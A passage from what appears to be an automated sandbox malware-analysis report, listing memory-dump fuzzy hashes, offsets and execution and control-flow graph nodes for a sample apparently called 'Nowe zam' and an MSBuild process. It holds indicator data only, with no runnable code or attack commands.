                                                                                                                • Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cfdde883f2f9c158f58ee9bbe80b7989085e14382f5245c8a9cad10ff9c56455
                                                                                                                • Instruction ID: 9c13c40971b6e78aa8c7fe6c5071a05d4396f897c3bec94bd00f9606c71c46ee
                                                                                                                • Opcode Fuzzy Hash: cfdde883f2f9c158f58ee9bbe80b7989085e14382f5245c8a9cad10ff9c56455
                                                                                                                • Instruction Fuzzy Hash: 10512A74E0021A8FDB14DFA9C5809AEFBF2BF89304F248169D519AB356D7309942CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 506d90c39c0f12929513bd7a8693a4666792ece2559763b49311ed9a6e3ccd06
                                                                                                                • Instruction ID: b6fb58714879a749fac95c96ee26ae5a25d1795745d3b1bcb3ac04f650125e07
                                                                                                                • Opcode Fuzzy Hash: 506d90c39c0f12929513bd7a8693a4666792ece2559763b49311ed9a6e3ccd06
                                                                                                                • Instruction Fuzzy Hash: 0E41EC75E006198FEB58CFAAD84179EBBB2BFC8300F14C0AAD559E7255DB340A868F51

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:18%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:7%
                                                                                                                Total number of Nodes:57
                                                                                                                Total number of Limit Nodes:11
                                                                                                                execution_graph 20004 65b9c18 20005 65b9c1f 20004->20005 20007 65b9c25 20004->20007 20005->20007 20009 65b9fa6 20005->20009 20010 65b9328 20005->20010 20008 65b9328 LdrInitializeThunk 20008->20009 20009->20007 20009->20008 20013 65b9329 20010->20013 20011 65b933a 20011->20009 20012 65b9a69 LdrInitializeThunk 20012->20011 20013->20011 20013->20012 20014 f2e018 20015 f2e024 20014->20015 20025 65b295b 20015->20025 20033 65b2968 20015->20033 20016 f2e0c3 20040 65be24a 20016->20040 20044 65be258 20016->20044 20017 f2e0ed 20048 65bfc5e 20017->20048 20052 65bfc68 20017->20052 20018 f2e61f 20026 65b2928 20025->20026 20027 65b2962 20025->20027 20028 65b2a56 20027->20028 20031 65b9328 LdrInitializeThunk 20027->20031 20056 65b992c 20027->20056 20062 65b9318 20027->20062 20068 65b9548 20027->20068 20028->20016 20031->20028 20034 65b2969 20033->20034 20035 65b2a56 20034->20035 20036 65b9548 2 API calls 20034->20036 20037 65b9318 2 API calls 20034->20037 20038 65b9328 LdrInitializeThunk 20034->20038 20039 65b992c 2 API calls 20034->20039 20035->20016 20036->20035 20037->20035 20038->20035 20039->20035 20041 65be27a 20040->20041 20042 65b9548 2 API calls 20041->20042 20043 65be344 20041->20043 20042->20043 20043->20017 20045 65be27a 20044->20045 20046 65b9548 2 API calls 20045->20046 20047 65be344 20045->20047 20046->20047 20047->20017 20049 65bfc8a 20048->20049 20050 65b9548 2 API calls 20049->20050 20051 65bfd3a 20049->20051 20050->20051 20051->20018 20053 65bfc8a 20052->20053 20054 65b9548 2 API calls 20053->20054 20055 65bfd3a 20053->20055 20054->20055 20055->20018 20061 65b97e3 20056->20061 20058 65b9a81 20058->20028 20059 65b9924 LdrInitializeThunk 20059->20058 20060 65b9328 LdrInitializeThunk 20060->20061 20061->20059 20061->20060 20063 65b931c 20062->20063 20064 65b933a 20063->20064 20065 65b9924 LdrInitializeThunk 20063->20065 20067 65b9328 LdrInitializeThunk 20063->20067 20064->20028 20065->20064 20067->20063 20073 65b9549 20068->20073 20069 65b96d9 20069->20028 20070 65b9924 LdrInitializeThunk 20070->20069 20072 65b9328 LdrInitializeThunk 20072->20073 20073->20069 20073->20070 20073->20072

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1010 65b9328-65b9338 1012 65b933a 1010->1012 1013 65b933f-65b934b 1010->1013 1014 65b946b-65b9475 1012->1014 1016 65b934d 1013->1016 1017 65b9352-65b9367 1013->1017 1016->1014 1020 65b947b-65b94bb 1017->1020 1021 65b936d-65b9378 1017->1021 1036 65b94c2-65b953e 1020->1036 1024 65b937e-65b9385 1021->1024 1025 65b9476 1021->1025 1027 65b93b2-65b93bd 1024->1027 1028 65b9387-65b939e 1024->1028 1025->1020 1032 65b93ca-65b93d4 1027->1032 1033 65b93bf-65b93c7 1027->1033 1028->1036 1037 65b93a4-65b93a7 1028->1037 1040 65b93da-65b93e4 1032->1040 1041 65b945e-65b9463 1032->1041 1033->1032 1069 65b9540-65b9542 1036->1069 1070 65b9545-65b9547 1036->1070 1037->1025 1043 65b93ad-65b93b0 1037->1043 1040->1025 1047 65b93ea-65b9406 1040->1047 1041->1014 1043->1027 1043->1028 1053 65b940a-65b940d 1047->1053 1054 65b9408 1047->1054 1056 65b940f-65b9412 1053->1056 1057 65b9414-65b9417 1053->1057 1054->1014 1058 65b941a-65b9428 1056->1058 1057->1058 1058->1025 1062 65b942a-65b9431 1058->1062 1062->1014 1063 65b9433-65b9439 1062->1063 1063->1025 1064 65b943b-65b9440 1063->1064 1064->1025 1066 65b9442-65b9455 1064->1066 1066->1025 1072 65b9457-65b945a 1066->1072 1071 65b9549-65b9577 1069->1071 1073 65b9544 1069->1073 1070->1071 1075 65b9579 1071->1075 1076 65b957e-65b9614 1071->1076 1072->1063 1074 65b945c 1072->1074 1073->1070 1074->1014 1075->1076 1078 65b96b3-65b96b9 1076->1078 1079 65b9619-65b962c 1078->1079 1080 65b96bf-65b96d7 1078->1080 1083 65b962e 1079->1083 1084 65b9633-65b9684 1079->1084 1081 65b96eb-65b96fe 1080->1081 1082 65b96d9-65b96e6 1080->1082 1086 65b9700 1081->1086 1087 65b9705-65b9721 1081->1087 1085 65b9a81-65b9b7e 1082->1085 1083->1084 1101 65b9697-65b96a9 1084->1101 1102 65b9686-65b9694 1084->1102 1092 65b9b80-65b9b85 1085->1092 1093 65b9b86-65b9b90 1085->1093 1086->1087 1090 65b9728-65b974c 1087->1090 1091 65b9723 1087->1091 1097 65b974e 1090->1097 1098 65b9753-65b9785 1090->1098 1091->1090 1092->1093 1097->1098 1106 65b978c-65b97ce 1098->1106 1107 65b9787 1098->1107 1103 65b96ab 1101->1103 1104 65b96b0 1101->1104 1102->1080 1103->1104 1104->1078 1109 65b97d0 1106->1109 1110 65b97d5-65b97de 1106->1110 1107->1106 1109->1110 1111 65b9a06-65b9a0c 1110->1111 1112 65b97e3-65b9808 1111->1112 1113 65b9a12-65b9a25 1111->1113 1116 65b980a 1112->1116 1117 65b980f-65b9846 1112->1117 1114 65b9a2c-65b9a47 1113->1114 1115 65b9a27 1113->1115 1118 65b9a49 1114->1118 1119 65b9a4e-65b9a62 1114->1119 1115->1114 1116->1117 1125 65b9848 1117->1125 1126 65b984d-65b987f 1117->1126 1118->1119 1123 65b9a69-65b9a7f LdrInitializeThunk 1119->1123 1124 65b9a64 1119->1124 1123->1085 1124->1123 1125->1126 1128 65b98e3-65b98f6 1126->1128 1129 65b9881-65b98a6 1126->1129 1130 65b98f8 1128->1130 1131 65b98fd-65b9922 1128->1131 1132 65b98a8 1129->1132 1133 65b98ad-65b98db 1129->1133 1130->1131 1136 65b9931-65b9969 1131->1136 1137 65b9924-65b9925 1131->1137 1132->1133 1133->1128 1138 65b996b 1136->1138 1139 65b9970-65b99d1 call 65b9328 1136->1139 1137->1113 1138->1139 1145 65b99d8-65b99fc 1139->1145 1146 65b99d3 1139->1146 1149 65b99fe 1145->1149 1150 65b9a03 1145->1150 1146->1145 1149->1150 1150->1111
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4778360792.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_65b0000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4dd34bb50585fe7a215bd5bf073025c3eaf8f91b5dc6e1f14741ecf04c909edf
                                                                                                                • Instruction ID: 6ebf29ad4059f7fd1cdd16c5db6220853c8da41a549bb593545aff0bd733c6f9
                                                                                                                • Opcode Fuzzy Hash: 4dd34bb50585fe7a215bd5bf073025c3eaf8f91b5dc6e1f14741ecf04c909edf
                                                                                                                • Instruction Fuzzy Hash: CB224774E002188FDB54DFA8C880BDDBBB2BF89304F1495A9E549AB395DB349D85CF90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 163bcfe87c029582b63779bfab5ba70ac3f25cbd8306db891871f5b9ae539ddf
                                                                                                                • Instruction ID: 7114e295888365c705bdc577dbea9308325dcfd9926388f9d372d342c7682ccb
                                                                                                                • Opcode Fuzzy Hash: 163bcfe87c029582b63779bfab5ba70ac3f25cbd8306db891871f5b9ae539ddf
                                                                                                                • Instruction Fuzzy Hash: C0826A71A00219CFCB15CFA8D984AAEBBF2BF88310F158569E405DB2A1D735ED81DF52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2ea0b3c9444e27ad34cb864edc2ba11ed934adb2aaf81f2c88cf3adf29708a87
                                                                                                                • Instruction ID: cba42873c90713e39a79a737cf83aa198b8c7830766b10202c16ce9a466e5ce7
                                                                                                                • Opcode Fuzzy Hash: 2ea0b3c9444e27ad34cb864edc2ba11ed934adb2aaf81f2c88cf3adf29708a87
                                                                                                                • Instruction Fuzzy Hash: B6127F71A002299FDB14DF69D854BAEBBF2BF88310F248529E406EB395EB349D41DF50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3399 f26fc8-f26ffe 3400 f27006-f2700c 3399->3400 3533 f27000 call f269a0 3399->3533 3534 f27000 call f27118 3399->3534 3535 f27000 call f26fc8 3399->3535 3401 f2700e-f27012 3400->3401 3402 f2705c-f27060 3400->3402 3405 f27021-f27028 3401->3405 3406 f27014-f27019 3401->3406 3403 f27062-f27071 3402->3403 3404 f27077-f2708b 3402->3404 3409 f27073-f27075 3403->3409 3410 f2709d-f270a7 3403->3410 3411 f27093-f2709a 3404->3411 3530 f2708d call f29dd0 3404->3530 3531 f2708d call f2a0e8 3404->3531 3532 f2708d call f2a088 3404->3532 3407 f270fe-f2713b 3405->3407 3408 f2702e-f27035 3405->3408 3406->3405 3420 f27146-f27166 3407->3420 3421 f2713d-f27143 3407->3421 3408->3402 3414 f27037-f2703b 3408->3414 3409->3411 3412 f270b1-f270b5 3410->3412 3413 f270a9-f270af 3410->3413 3416 f270bd-f270f7 3412->3416 3417 f270b7 3412->3417 3413->3416 3418 f2704a-f27051 3414->3418 3419 f2703d-f27042 3414->3419 3416->3407 3417->3416 3418->3407 3422 f27057-f2705a 3418->3422 3419->3418 3428 f27168 3420->3428 3429 f2716d-f27174 3420->3429 3421->3420 3422->3411 3430 f274fc-f27505 3428->3430 3431 f27176-f27181 3429->3431 3432 f27187-f2719a 3431->3432 3433 f2750d-f27513 3431->3433 3438 f271b0-f271cb 3432->3438 3439 f2719c-f271aa 3432->3439 3440 f27515-f27519 3433->3440 3447 f271ef-f271f2 3438->3447 3448 f271cd-f271d3 3438->3448 3439->3438 3445 f27484-f2748b 3439->3445 3440->3433 3441 f2751b-f27521 3440->3441 3441->3440 3443 f27523-f27549 3441->3443 3449 f27552-f27556 3443->3449 3450 f2754b-f27550 3443->3450 3445->3430 3453 f2748d-f2748f 3445->3453 3454 f271f8-f271fb 3447->3454 3455 f2734c-f27352 3447->3455 3451 f271d5 3448->3451 3452 f271dc-f271df 3448->3452 3456 f2755c-f2755d 3449->3456 3450->3456 3451->3452 3451->3455 3457 f27212-f27218 3451->3457 3458 f2743e-f27441 3451->3458 3452->3457 3459 f271e1-f271e4 3452->3459 3460 f27491-f27496 3453->3460 3461 f2749e-f274a4 3453->3461 3454->3455 3463 f27201-f27207 3454->3463 3455->3458 3462 f27358-f2735d 3455->3462 3468 f2721a-f2721c 3457->3468 3469 f2721e-f27220 3457->3469 3470 f27447-f2744d 3458->3470 3471 f27508 3458->3471 3464 f271ea 3459->3464 3465 f2727e-f27284 3459->3465 3460->3461 3461->3433 3466 f274a6-f274ab 3461->3466 3462->3458 3463->3455 3467 f2720d 3463->3467 3464->3458 3465->3458 3474 f2728a-f27290 3465->3474 3472 f274f0-f274f3 3466->3472 3473 f274ad-f274b2 3466->3473 3467->3458 3475 f2722a-f27233 3468->3475 3469->3475 3476 f27472-f27476 3470->3476 3477 f2744f-f27457 3470->3477 3471->3433 3472->3471 3482 f274f5-f274fa 3472->3482 3473->3471 3483 f274b4 3473->3483 3484 f27292-f27294 3474->3484 3485 f27296-f27298 3474->3485 3479 f27246-f2726e 3475->3479 3480 f27235-f27240 3475->3480 3476->3445 3481 f27478-f2747e 3476->3481 3477->3433 3478 f2745d-f2746c 3477->3478 3478->3438 3478->3476 3505 f27362-f27398 3479->3505 3506 f27274-f27279 3479->3506 3480->3458 3480->3479 3481->3431 3481->3445 3482->3430 3482->3453 3487 f274bb-f274c0 3483->3487 3486 f272a2-f272b9 3484->3486 3485->3486 3498 f272e4-f2730b 3486->3498 3499 f272bb-f272d4 3486->3499 3491 f274e2-f274e4 3487->3491 3492 f274c2-f274c4 3487->3492 3491->3471 3496 f274e6-f274e9 3491->3496 3493 f274d3-f274d9 3492->3493 3494 f274c6-f274cb 3492->3494 3493->3433 3497 f274db-f274e0 3493->3497 3494->3493 3496->3472 3497->3491 3501 f274b6-f274b9 3497->3501 3498->3471 3509 f27311-f27314 3498->3509 3499->3505 3510 f272da-f272df 3499->3510 3501->3471 3501->3487 3513 f273a5-f273ad 3505->3513 3514 f2739a-f2739e 3505->3514 3506->3505 3509->3471 3512 f2731a-f27343 3509->3512 3510->3505 3512->3505 3529 f27345-f2734a 3512->3529 3513->3471 3515 f273b3-f273b8 3513->3515 3516 f273a0-f273a3 3514->3516 3517 f273bd-f273c1 3514->3517 3515->3458 3516->3513 3516->3517 3519 f273c3-f273c9 3517->3519 3520 f273e0-f273e4 3517->3520 3519->3520 3521 f273cb-f273d3 3519->3521 3522 f273e6-f273ec 3520->3522 3523 f273ee-f2740d call f276f1 3520->3523 3521->3471 3525 f273d9-f273de 3521->3525 3522->3523 3526 f27413-f27417 3522->3526 3523->3526 3525->3458 3526->3458 3527 f27419-f27435 3526->3527 3527->3458 3529->3505 3530->3411 3531->3411 3532->3411 3533->3400 3534->3400 3535->3400
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 78bd7a5f15a23e971b7d38b5431bd288491b0aa0a801e83914ce51847b7ba900
                                                                                                                • Instruction ID: 9699e0a43ba1bb7034121538efac17ee1d5bb48dc876ebb32b088a6c038a97ed
                                                                                                                • Opcode Fuzzy Hash: 78bd7a5f15a23e971b7d38b5431bd288491b0aa0a801e83914ce51847b7ba900
                                                                                                                • Instruction Fuzzy Hash: 49124031A04229DFCB15EF69E844AAEBBF2BF48310F158069E815EB261D734ED41EF51

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3537 f23e09-f23e25 3538 f23e27-f23e29 3537->3538 3539 f23e2e-f23e3e 3537->3539 3540 f240cc-f240d3 3538->3540 3541 f23e40 3539->3541 3542 f23e45-f23e55 3539->3542 3541->3540 3544 f240b3-f240c1 3542->3544 3545 f23e5b-f23e69 3542->3545 3548 f240d4-f241ba 3544->3548 3550 f240c3-f240c7 call f202c8 3544->3550 3545->3548 3549 f23e6f 3545->3549 3619 f241c1-f242c9 call f22358 call f22368 call f22378 call f22388 call f202e4 3548->3619 3620 f241bc 3548->3620 3549->3548 3551 f23f72-f23f9a 3549->3551 3552 f23eb3-f23ed5 3549->3552 3553 f23e76-f23e88 3549->3553 3554 f23eda-f23efb 3549->3554 3555 f24039-f24065 3549->3555 3556 f23f9f-f23fc7 3549->3556 3557 f23f00-f23f21 3549->3557 3558 f23f26-f23f47 3549->3558 3559 f24067-f24082 call f202d8 3549->3559 3560 f240a7-f240b1 3549->3560 3561 f24084-f240a5 call f228f0 3549->3561 3562 f2400e-f24034 3549->3562 3563 f23f4c-f23f6d 3549->3563 3564 f23fcc-f24009 3549->3564 3565 f23e8d-f23eae 3549->3565 3550->3540 3551->3540 3552->3540 3553->3540 3554->3540 3555->3540 3556->3540 3557->3540 3558->3540 3559->3540 3560->3540 3561->3540 3562->3540 3563->3540 3564->3540 3565->3540 3638 f242cf-f2435f 3619->3638 3620->3619
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d0a7107c92c48868e81aca2992cc16a02afb74333bab876ff9f894d0c6e7db4f
                                                                                                                • Instruction ID: f84e58f2a036afb16781308ea47afe82b77d7d3538c1a763d7a7727b0d031b1a
                                                                                                                • Opcode Fuzzy Hash: d0a7107c92c48868e81aca2992cc16a02afb74333bab876ff9f894d0c6e7db4f
                                                                                                                • Instruction Fuzzy Hash: 09F1AE35E05258CFDB08DFB5E8506AEBBB2BF89300B14856AE906E7354DF359C02DB51

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 3881 f23a99-f23c64 3882 f23c69-f23ca4 3881->3882 3882->3882 3883 f23ca6-f23cd9 3882->3883 3885 f23cea-f23cf2 3883->3885 3886 f23cdb-f23cdd 3883->3886 3889 f23cf4-f23d02 3885->3889 3887 f23ce3-f23ce8 3886->3887 3888 f23cdf-f23ce1 3886->3888 3887->3889 3888->3889 3892 f23d04-f23d06 3889->3892 3893 f23d18-f23d20 3889->3893 3894 f23d08-f23d0d 3892->3894 3895 f23d0f-f23d16 3892->3895 3896 f23d23-f23d26 3893->3896 3894->3896 3895->3896 3898 f23d28-f23d36 3896->3898 3899 f23d3d-f23d41 3896->3899 3898->3899 3906 f23d38 3898->3906 3900 f23d43-f23d51 3899->3900 3901 f23d5a-f23d5d 3899->3901 3900->3901 3908 f23d53 3900->3908 3902 f23d65-f23d9a 3901->3902 3903 f23d5f-f23d63 3901->3903 3912 f23dfc-f23e01 3902->3912 3903->3902 3905 f23d9c-f23db3 3903->3905 3910 f23db5-f23db7 3905->3910 3911 f23db9-f23dc5 3905->3911 3906->3899 3908->3901 3910->3912 3913 f23dc7-f23dcd 3911->3913 3914 f23dcf-f23dd9 3911->3914 3915 f23de1 3913->3915 3914->3915 3916 f23ddb 3914->3916 3918 f23de9-f23df5 3915->3918 3916->3915 3918->3912
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9df6d208b3542ad58d829a2550f59194085105aacbddfde361fe4e530e41e71a
                                                                                                                • Instruction ID: 6d36f21a4d3a6de02a62354b603ec97b0c57fb230aa2a7072bfe8cfced37bcf5
                                                                                                                • Opcode Fuzzy Hash: 9df6d208b3542ad58d829a2550f59194085105aacbddfde361fe4e530e41e71a
                                                                                                                • Instruction Fuzzy Hash: 99A1C9A3D8D7E05FDB62867808F81A77FB18BA350478844AFD4C382596F95CD606D352
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b6213a3c01aa29c1ace273853d1caaaf365c951da745eb8d2c25b459ef7d7cc6
                                                                                                                • Instruction ID: 151d077d0d004ba1e3dd7e14bddaa48f39e623134f9676cc67a6753164578639
                                                                                                                • Opcode Fuzzy Hash: b6213a3c01aa29c1ace273853d1caaaf365c951da745eb8d2c25b459ef7d7cc6
                                                                                                                • Instruction Fuzzy Hash: 4CA1D475E00228DFDB14DFAAD894A9DBBF2BF89310F148069E409AB365DB349D41DF90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f750b443443cec2eaf415a20fcce23e50262023c6d840434415da245f4bb3690
                                                                                                                • Instruction ID: be51a675dde82ebf88c0cc8df25203dd29a0680236f6fa82d24e65c799761f64
                                                                                                                • Opcode Fuzzy Hash: f750b443443cec2eaf415a20fcce23e50262023c6d840434415da245f4bb3690
                                                                                                                • Instruction Fuzzy Hash: 8F81C374E01628CFDB14DFAAD894B9DBBF2BF88314F148069E409AB365DB349981DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cd4f493bf304b11012fb98529b85190fa9211bd2d16b97b8f35823df447f67d9
                                                                                                                • Instruction ID: fc058b9874c2c3d6119b29105826fd6a1edea8a7129d624d8d3a8c34926348fe
                                                                                                                • Opcode Fuzzy Hash: cd4f493bf304b11012fb98529b85190fa9211bd2d16b97b8f35823df447f67d9
                                                                                                                • Instruction Fuzzy Hash: 6481C274E00228CFDB14DFAAD894B9DBBF2BF88310F249069E409AB365DB349941DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a5b130f9f505a41b6b3880fb658c722c623c767f0e594729250b77338f667123
                                                                                                                • Instruction ID: 3e2e0b7eb71a849ad08da951b0751242629cbea9429b604eaad8bee71f602f82
                                                                                                                • Opcode Fuzzy Hash: a5b130f9f505a41b6b3880fb658c722c623c767f0e594729250b77338f667123
                                                                                                                • Instruction Fuzzy Hash: 9881B274E01218CFEB14DFAAD884B9DBBF2BF89310F248069E409AB365DB349945DF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a784b35363f0b5daabc21df17a12a070a606dc21906a7e640b1b68f7e5e9a13a
                                                                                                                • Instruction ID: 21d91ce0d6162f8871c9ac9071db4dca3cf51007c3a05b28e994dff50f6a31a6
                                                                                                                • Opcode Fuzzy Hash: a784b35363f0b5daabc21df17a12a070a606dc21906a7e640b1b68f7e5e9a13a
                                                                                                                • Instruction Fuzzy Hash: 5B81A174E01218CFDB14DFAAD894B9DBBF2BF88310F248069E409AB365DB749945DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ee2096f90bdf8b150be3219ec771df29fe44f1d0bc2c9e6a5669f1bfa2083bf2
                                                                                                                • Instruction ID: 855683962e1fca638ad2cb17d014ee54c05471b160864b22b03093b3fe0f1e56
                                                                                                                • Opcode Fuzzy Hash: ee2096f90bdf8b150be3219ec771df29fe44f1d0bc2c9e6a5669f1bfa2083bf2
                                                                                                                • Instruction Fuzzy Hash: 3581B274E00218CFDB14DFAAD894B9DBBF2BF88310F258069E409AB365DB349945DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6da8c5e41984c0f59ebc0fa0dc1d0004f5b5ddbed47e7196b9cc7f118ead655e
                                                                                                                • Instruction ID: 6dfe07affb4ab5bb1e35152a0d72e9773c6f07b337d4a1e2bed043b498530e67
                                                                                                                • Opcode Fuzzy Hash: 6da8c5e41984c0f59ebc0fa0dc1d0004f5b5ddbed47e7196b9cc7f118ead655e
                                                                                                                • Instruction Fuzzy Hash: A381B574E01218CFEB14DFAAE984B9DBBF2BF88310F148069E409AB365DB349945DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b09efd1ccef2cf6240de5502523274e418dd1e8cd5ea47c89d87b113902686b8
                                                                                                                • Instruction ID: 166cbfc6e532c7f71da2446b403ea3674d4b9a0446f7f6fd9d82dc26992dc824
                                                                                                                • Opcode Fuzzy Hash: b09efd1ccef2cf6240de5502523274e418dd1e8cd5ea47c89d87b113902686b8
                                                                                                                • Instruction Fuzzy Hash: 4B819174E01218CFDB14DFAAD994B9DBBF2BF88310F148069E409AB365DB345985DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ae217ec2590553bebe221cbef9d96bb3a261048b95d591d9d2c7905fc535492e
                                                                                                                • Instruction ID: fc01b0cbdb2f3d635f5fd75dffff401d4b75d37da2683f65c4750e85e53e814c
                                                                                                                • Opcode Fuzzy Hash: ae217ec2590553bebe221cbef9d96bb3a261048b95d591d9d2c7905fc535492e
                                                                                                                • Instruction Fuzzy Hash: 9F513870D11228CBDB14EFA9E845B9EB7B2FB89300F248138E405AB294D7759D49DF54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
